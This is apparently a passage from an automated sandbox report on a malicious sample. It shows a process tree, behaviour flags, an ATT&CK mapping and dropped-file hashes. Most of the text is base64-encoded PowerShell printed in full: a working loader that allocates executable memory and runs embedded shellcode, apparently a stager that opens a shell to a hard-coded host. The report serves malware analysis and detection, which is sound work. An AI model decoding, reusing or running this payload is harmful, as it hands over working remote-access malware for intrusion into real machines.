sAJABWAEsAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVgBLACAAJABTAGIAUQAgACQASQBTACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFMAYgBRACAAJABJAFMAIgA7AH0A'"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAEQAIAA9ACAAJwAkAFMAYgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFEAcQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB5AFcAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAA5ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABkADIALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOABiACwAMAB4ADQAMAAsADAAeAA3ADgALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANQAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAZQAzACwAMAB4ADMAYwAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADIALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAYgAsADAAeAA4ADYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeABlAGEALAAwAHgAMABmACwAMAB4AGQAZgAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADcALAAwAHgANgBhACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAYwAwACwAMAB4AGEAOAAsADAAeABlAGEALAAwAHgAOAA2ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAMAAwACwAMAB4ADAAOAAsADAAeAAyAGUALAAwAHgAOAA5ACwAMAB4AGUANgAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4ADMANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADgANQAsADAAeABmADYALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeABjADMAOwAkAEsAYQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB5AFcALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASwBhACAAPQAgACQAeQBXAC4ATABlAG4AZwB0AGgAfQA7ACQASQBTAGIAPQAkAFEAcQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAEsAYQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAFcAbAA9ADAAOwAkAFcAbAAgAC0AbABlACAAKAAkAHkAVwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABXAGwAKwArACkAIAB7ACQAUQBxADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASQBTAGIALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBsACkALAAgACQAeQBXAFsAJABXAGwAXQAsACAAMQApAH0AOwAkAFEAcQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASQBTAGIALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAEkAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABvAEQAKQApADsAJABTAGIAUQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABWAEsAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVgBLACAAJABTAGIAUQAgACQASQBTACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFMAYgBRACAAJABJAFMAIgA7AH0A
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2380
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABTAGIAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFEAcQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB5AFcAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAA5ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABkADIALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMAAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOABiACwAMAB4ADQAMAAsADAAeAA3ADgALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgANQAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAZQAzACwAMAB4ADMAYwAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADIALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAYgAsADAAeAA4ADYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeABlAGEALAAwAHgAMABmACwAMAB4AGQAZgAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADcALAAwAHgANgBhACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAYwAwACwAMAB4AGEAOAAsADAAeABlAGEALAAwAHgAOAA2ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAMAAwACwAMAB4ADAAOAAsADAAeAAyAGUALAAwAHgAOAA5ACwAMAB4AGUANgAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4ADMANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADgANQAsADAAeABmADYALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeABjADMAOwAkAEsAYQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB5AFcALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASwBhACAAPQAgACQAeQBXAC4ATABlAG4AZwB0AGgAfQA7ACQASQBTAGIAPQAkAFEAcQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAEsAYQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAFcAbAA9ADAAOwAkAFcAbAAgAC0AbABlACAAKAAkAHkAVwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABXAGwAKwArACkAIAB7ACQAUQBxADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASQBTAGIALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBsACkALAAgACQAeQBXAFsAJABXAGwAXQAsACAAMQApAH0AOwAkAFEAcQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASQBTAGIALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7AA==
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2840
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xf4b8ew9.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8FD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA8FC.tmp"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA8FD.tmp

Filesize
1KB

MD5
f77848a549fd48259a5b8dc786802352

SHA1
1f46156e27918f79e44127e26675e1c88abe8ca6

SHA256
940017b8c2b57e190ab698ad8360be275bcc698f35fac2ab06543113294cd30a

SHA512
c9de3c2f5c2f64022bf0810fe7634cd0b164d673eea522099ffe0e3329b94deec264c1ce97f1a0f3171dfcdc1ea28e1075d8a592b1a9b1cf37b618a01ac0c41c

Download Submit
C:\Users\Admin\AppData\Local\Temp\xf4b8ew9.dll

Filesize
3KB

MD5
c20aa29e100d589f398f0f0a44150228

SHA1
8851aed942827e0bd70bb6c27498dc8f96d9bddb

SHA256
04c96ee930f7b305e396c42a833478103b403b65d3f7227ca8624608dddefc3a

SHA512
e5ad9b4362dc54865bd745c2b2de57f11062f983cc6a42f5c4080d1e7992a94e4f52bfaae2e87ccc783549d2dc0eafad2d1a742855162d956893e32bf95e2f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\xf4b8ew9.pdb

Filesize
7KB

MD5
36e1cd8f6536525ad7e425f70a7db122

SHA1
ddf47387c863b46f75ddf90cc5eeccf66406eae9

SHA256
469ca751555da56d53a33a60430207987e3dea8036a20fbd5716687d861f6c62

SHA512
1a2958c2ac407eb41473415cf253be2a75fff4746606ca35cccd9e94a54c529e9a638ec2266064f9f6834840d1b399851375848db47a20b458db9a73b3900dbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{7CB48A1E-B887-4AEA-8CD5-2785DFE8E7DC}\18.hta

Filesize
16KB

MD5
80be9c3c1e4fe46fe2696264da78869b

SHA1
d1d796c36bb95d713166fc8a953688190e896402

SHA256
89c65ff90cc2f276939ae1c871eec3db22b86a944ec11199c1a2f92ae70f354e

SHA512
c92d0b78b14a1d00cdf2220e57b0a7c948a404264132b49c6de9ccc6a86a7fda8963901792ee11af0348cb50912618dfefb0abb4ee6fa421d0a1ee1526b85279

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b215decee40b526f47d340d61e9461fe

SHA1
755a6455e44cf34cffd9817a66fa25f2016b27bc

SHA256
e03dd139f0e96b38c56b2f918bf6c0c86d117ab09ae8812210fe86e5f0830a6d

SHA512
692ac9081d6bf42d030eec81305d1357f1db6fb5282c419e8e4617a9f6bbce2fbff0b98439a2fad2cc73f45330cb63e614759cb6b963678b0ae3cd4778164706

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA8FC.tmp

Filesize
652B

MD5
da20961caa6509979e637acc818451d7

SHA1
5917c5509083155ae0e38345fe66eff06a3696be

SHA256
6fbb67a6472da078a0c120f9083396c696afe2786497bbbc4eda750721e16ea4

SHA512
114b6d546a4adcf6963201237e05877a7520a79b034613a41810557dbe4aafaaa8f31ad3903fe45a5f6e080be9b69d1ae8e29c4cfdfd6092020708cf51219097

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xf4b8ew9.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xf4b8ew9.cmdline

Filesize
309B

MD5
6b8d7234cf2b5fd68531ef337f37cef3

SHA1
ef43931373fd303089fa72e1cd55ec14cbe7ad84

SHA256
37fb200117256aa5125ba926f1c3c388866aa61658dce8f86593dd78278f974c

SHA512
3bc24c9fb35ccc8d57f1c8397ad35c24793a20614eb1b8f6042fd409d3d90e99f0f9143ea7947fe047dd03f8e51162a5961e15078e491bf60555a169164317e8

Download Submit
memory/2840-29-0x0000000002E40000-0x0000000002E41000-memory.dmp

Filesize
4KB

Download